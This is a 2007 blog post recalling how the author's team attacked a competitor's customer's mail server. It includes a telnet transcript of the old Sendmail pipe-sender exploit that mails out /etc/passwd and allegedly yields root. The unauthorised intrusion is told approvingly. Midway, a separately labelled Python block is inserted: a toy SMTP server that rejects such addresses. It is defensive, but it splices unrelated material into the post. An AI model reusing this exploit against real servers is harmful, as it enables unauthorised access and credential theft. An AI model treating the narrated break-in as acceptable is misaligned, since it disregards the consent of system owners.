Friday, March 09, 2007

It's a mail (blog) distributed on Feb 14.

None of you were convinced that Pipes (Yahoo) would be used for smoking. At least try to smoke the following blah..blah.

I was not thrilled about the 0DD initiative taken last year, for a couple of reasons.

1) When our team couldn't participate due to the rules, we didn't bother about it.

2) I love bugs for unforgettable reasons (the long history should be interesting for you).

My first task at my first employer was writing an IRC chat server. And we had a deadline too, since we had to ship it to another big .COM company (the 3rd biggest .COM in India in 2000). The deadline came, and we delivered the software on time with hundreds of known issues and zero bugs (when we agree on it before the customer finds it, we call it a known issue :)).

Nobody really exploited the issues that we, the development team, knew about, since chat was in its early stage in Chennai and not many people were using it; we hardly saw 50 concurrent users. But as usual, like any other software, the chat server used to conk out often for unknown reasons. Later one of our developers started chatting with every other chatter, posing as just another chatter, and he identified that a Hungarian (born in Chennai) could control the shutdown operation of the server using a simple IRC protocol implementation bug. Whenever he felt like shutting it down, he did so. Since we were amateur programmers, we did not write enough logs to know the actual chat transcript. None of us knew about sniffers. It took more than a month to identify the root cause of the first bug.

Meanwhile our CEO, himself a good hacker, challenged us to learn more about security, and we also lost the contract our esteemed organization had expected.

Since it was in the beta stage, our customer switched to a better IRC implementation. So we knew the target that needed to be hacked (our customer's server) to prove (to the CEO and the .COM company) that we were much better than the current vendor.

---------------------------- Another thread begins -------------------------
Exactly at the same time, we came to know that RedHat had been acquired by Microsoft; we confirmed it from a page of typical Microsoft home-page information. I was using all the abusive language against Linus Torvalds, who had guided RedHat to do that. Google was helpless to find more information about the financial worth of the deal.

After a couple of days, we came to know that the above link was not from Microsoft; it was an illusion created by cross-site scripting. We confirmed it by using the Opera browser. I can't forget such a graceful IE bug. Hats off to William Gates. They are very innovative in creating bugs. Ask the people who hacked Windows Vista using the speech recognition control. You can control a remote computer just by using an analog phone. (No other digital system in this world can be hacked using just analog signals.)

Because of their innovative bugs, they spotted a place where they can sell advertisement space (the Dr Watson error message and the blue screen). So bugs help them a lot :). I was really motivated by the above bug, and now we switched our context to .COM.
----------------------------Thread End----------------------------

We used to be 24*7*60 in our office. I spent all my time securing my IRC server, and whenever I felt tired, I raised my war chest against .COM using a simple tool called telnet. Since we were working with IRC, it took no time to learn SMTP. We prepared good documentation about all the services running on the .COM server, and the climax was that the .COM company was using Sendmail 5.xx.

Let me explain the SMTP protocol so you know how we hacked it.

The SMTP protocol is simple:

1. Make a network connection (TCP port 25).
2. Say hello (HELO) and give the address used for the outgoing mail (MAIL FROM).
3. Give the target address the mail has to be sent to (RCPT TO).
4. Start the message (DATA) and type the subject.
5. Type the body of the message.
6. Send a line containing only "." (END).

Sendmail had a bug: an unpatched Sendmail could be made to execute UNIX commands. Using the approach below, we logged in as the root user on the same box.

Every year, I just remember this lovable day and my valentine (the COMPUTER). Life became so beautiful because of bugs. Now just tell me, are bugs lovable? Ask anyone who knows the meaning of "Hemiptera".

-------------------For SMTP Hacking-------------------

% telnet targetsmtpserver 25
Connected to targetsmtpserver
Escape character is '^]'.
220 targetsmtpserver Sendmail 5.55 ready at Mon, 12 Feb 00 23:51
mail from: "|/bin/mail < /etc/passwd"
250 "|/bin/mail < /etc/passwd"... Sender ok
rcpt to: william
550 william... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
Connection closed by foreign host.
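To make the six protocol steps and the fix for the old Sendmail behaviour concrete, here is an added example that is not part of the original post and not Sendmail's code. It is a small in-memory SMTP state machine that answers one client line at a time, so the whole exchange from the steps above can be replayed offline. The names (ToySmtpServer, envelope_address_ok, run_session), the hostname mx.example.test and the mailboxes are all constructed for this illustration. The point it demonstrates is the defender's one: a mail server must treat the MAIL FROM / RCPT TO arguments as mailbox names only, so a sender string that is really a program or file path is refused with a 501 at the envelope stage instead of being accepted with "250 ... Sender ok" as in the transcript above.

```python
import re

# Plain mailbox form local-part@domain. Constructed for this example; a real MTA
# implements the full RFC 5321 grammar, this is deliberately strict and simple.
_MAILBOX_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def envelope_address_ok(addr: str) -> bool:
    """Accept only a plain mailbox; refuse anything that old sendmail versions
    would have treated as a program ('|cmd') or a file path ('/path') target."""
    addr = addr.strip()
    if len(addr) >= 2 and addr[0] == '"' and addr[-1] == '"':
        addr = addr[1:-1]          # quoting does not change what the address means
    if len(addr) >= 2 and addr[0] == "<" and addr[-1] == ">":
        addr = addr[1:-1]          # angle brackets are the normal envelope form
    if not addr or addr[0] in "|/" or any(c in addr for c in "|<>;`$ "):
        return False
    return _MAILBOX_RE.match(addr) is not None


class ToySmtpServer:
    """In-memory SMTP state machine (constructed for illustration). Feed it one
    client line and it returns the reply a server would send. With
    validate_envelope=False it mimics the permissive behaviour of accepting any
    string as the sender; with True it applies envelope_address_ok first."""

    def __init__(self, hostname="mx.example.test", validate_envelope=True):
        self.hostname = hostname
        self.validate_envelope = validate_envelope
        self.state = "connected"   # connected -> helo -> mail -> rcpt -> data
        self.sender = None
        self.rcpts = []
        self.body = []
        self.delivered = []        # (sender, recipients, body) tuples

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready"

    def handle(self, line):
        if self.state == "data":   # collecting the message until a lone "."
            if line == ".":
                self.delivered.append((self.sender, list(self.rcpts), "\n".join(self.body)))
                self.state = "helo"
                return "250 Mail accepted"
            self.body.append(line[1:] if line.startswith("..") else line)  # undo dot-stuffing
            return ""              # body lines get no reply
        verb, _, arg = line.strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb == "HELO":
            self.state = "helo"
            return f"250 {self.hostname} Hello {arg or 'unknown'}"
        if verb == "MAIL" and arg.upper().startswith("FROM:"):
            addr = arg[5:].strip()
            if self.state != "helo":
                return "503 Send HELO first"
            if self.validate_envelope and not envelope_address_ok(addr):
                return f"501 {addr}... Sender address rejected"
            self.sender, self.rcpts, self.body, self.state = addr, [], [], "mail"
            return f"250 {addr}... Sender ok"
        if verb == "RCPT" and arg.upper().startswith("TO:"):
            addr = arg[3:].strip()
            if self.state not in ("mail", "rcpt"):
                return "503 Need MAIL command"
            if self.validate_envelope and not envelope_address_ok(addr):
                return f"501 {addr}... Recipient address rejected"
            self.rcpts.append(addr)
            self.state = "rcpt"
            return f"250 {addr}... Recipient ok"
        if verb == "DATA":
            if self.state != "rcpt":
                return "503 Need RCPT command"
            self.state = "data"
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            self.state = "closed"
            return f"221 {self.hostname} closing connection"
        return "500 Command unrecognized"


def run_session(server, client_lines):
    """Replay a client script against the server; returns (client line, reply)
    pairs, with the server greeting as the first entry."""
    transcript = [("", server.greeting())]
    for line in client_lines:
        transcript.append((line, server.handle(line)))
    return transcript


# Constructed client script following the post's six steps with a plain mailbox.
NORMAL_SESSION = [
    "HELO client.example.test",
    "MAIL FROM:<alice@example.test>",
    "RCPT TO:<bob@example.test>",
    "DATA",
    "Subject: hello",
    "",
    "Just testing.",
    ".",
    "QUIT",
]

# The sender string from the post's transcript, replayed only to show the refusal.
PIPE_SENDER_LINE = 'mail from: "|/bin/mail < /etc/passwd"'

if __name__ == "__main__":
    for mode in (False, True):
        print(f"--- validate_envelope={mode}")
        for client, reply in run_session(ToySmtpServer(validate_envelope=mode),
                                         ["HELO client.example.test", PIPE_SENDER_LINE]):
            if client:
                print("C:", client)
            if reply:
                print("S:", reply)
```

Run stand-alone it prints the two dialogues side by side: the permissive server answers the pipe sender with "250 ... Sender ok" exactly as in the transcript above, while the validating server stops the session at the envelope with a 501 and never reaches DATA. The same check applies to RCPT TO, which is where a bounce to a program-style sender would otherwise be generated.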

/etc/passwd - UNIX password file
Sendmail - mail server
0DD - zero-defect delivery

Note: I dedicate this blog to "Prabhu, Kannan, Gokul, Sara, Murali" for this Valentine's Day.

1 comment:

Anonymous said...

I am always inspired by you, your opinion and way of thinking. Again, thanks for this nice post.

- Norman